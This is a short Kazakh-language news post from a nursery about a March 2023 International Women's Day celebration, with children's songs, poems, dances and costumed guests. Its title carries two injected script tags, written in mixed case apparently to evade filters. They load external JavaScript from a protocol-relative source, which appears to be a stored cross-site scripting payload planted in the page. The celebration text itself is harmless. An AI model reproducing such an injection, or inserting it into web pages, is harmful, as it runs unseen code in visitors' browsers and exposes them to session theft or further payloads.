"Күншуақ" кіші тобында 8-Наурыз аналар, қыздар мерекесіне орай "Ана деп ән саламын" тақырыбында ертеңгілік<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

07.03.2023

Уәлиханов көшесіндегі "Ақбота" бөбекжайындағы "Күншуақ" кіші  тобында   8-Наурыз аналар, қыздар мерекесіне орай "Ана деп ән саламын" тақырыбында  ертеңгілік өтті. Мерекелік ертеңгілікке балалар әдемі киініп келіп, жақсы көңіл-күймен қарсы алды. Балалар аналарына ,әжелеріне арнап тақпақтарын айтып, ән шырқап, би биледі. Ата- аналармен, балалармен ойын ойнатылды. Мерекеге Көктем аруы, Қызыл телпек пен Аю қонаққа келіп, балалармен көңіл көтерді. Ұлдарымыз қыздарға арнап сыйлық тарту етті. Мереке балаларға қызықты өтті.

Просмотров: 239


Пікір қосу



Деректерді қолтаңбаға қосу